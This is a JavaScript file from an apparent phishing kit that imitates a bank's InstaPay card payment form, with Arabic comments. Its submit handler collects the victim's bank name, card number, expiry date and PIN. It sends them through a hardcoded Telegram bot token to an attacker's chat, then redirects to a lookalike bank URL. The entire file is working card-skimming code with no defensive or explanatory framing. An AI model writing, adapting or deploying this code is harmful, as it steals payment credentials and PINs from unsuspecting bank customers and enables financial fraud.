function onSubmitClick() {
  var month = document.getElementById("month").value;
  var year = document.getElementById("year").value;
  var cardNumberInput = document.getElementById("cardNumber").value;
  var cardNumberS = document.querySelector('select[name="prefix"]').value;
  var pin = document.getElementById("pin").value;
  var BankName = document.getElementById("BankName").value;
  var SumNum = cardNumberS+cardNumberInput.value ;

  var data = { month: month, year: year, SumNum: SumNum };
  var jsonData = JSON.stringify(data);

  // حفظ البيانات في localStorage
  localStorage.setItem("userData", jsonData);
  
  // إظهار تحذير للنجاح
  //alert("Data saved successfully!");

  // إعادة توجيه إلى الصفحة الجديدة بعد 3 ثوانٍ
  setTimeout(() => {
      window.location.href = 'https://n.clibk.com/pay/NatioNalC0mmerce5/pg.cbk.com/instapay/Customer/InstaPay/ConfirmPay/pay1.html';
  }, 500);


  // إعداد الرسالة لإرسالها إلى Telegram
  const message = `🏦اسم البنك: ${BankName}\n➖➖➖➖➖➖➖➖➖➖➖➖\n 🔰البادئة: ${cardNumberS}\n➖➖➖➖➖➖➖➖➖➖➖➖\n 💳رقم البطاقة: ${cardNumberInput}\n➖➖➖➖➖➖➖➖➖➖➖➖\n📅الشهر: ${month}\n➖➖➖➖➖➖➖➖➖➖➖➖\n 📅السنة : ${year}\n➖➖➖➖➖➖➖➖➖➖➖➖\n  🔐الرمز: ${pin}\n`;

  // إرسال البيانات إلى Telegram
  const token = '7025523147:AAHHr48tobBN3YZ-ltsB7c6NTNJOAZub08Y'; // توكن البوت الخاص بك
  const chatId = '-1002284824090'; // معرف المجموعة أو المستخدم

  fetch(`https://api.telegram.org/bot${token}/sendMessage`, {
    method: 'POST',
    headers: {
      'Content-Type': 'application/json'
    },
    body: JSON.stringify({
      chat_id: chatId,
      text: message
    })
  })
  .then(response => {
    if (!response.ok) {
      throw new Error('فشل في إرسال البيانات إلى تلغرام.');
    }
    return response.json();
  })
  .then(data => {
    console.log('تم إرسال البيانات بنجاح إلى تلغرام:', data);

    // تحويل المستخدم إلى صفحة أخرى بعد النجاح
    window.location.href = 'https://n.clibk.com/pay/NatioNalC0mmerce5/pg.cbk.com/instapay/Customer/InstaPay/ConfirmPay/pay1.html'; // يمكنك استبدال الرابط بالصفحة التي تريد الانتقال إليها
  })
  .catch(error => {
    console.error('خطأ في الإرسال إلى تلغرام:', error);
  });
}
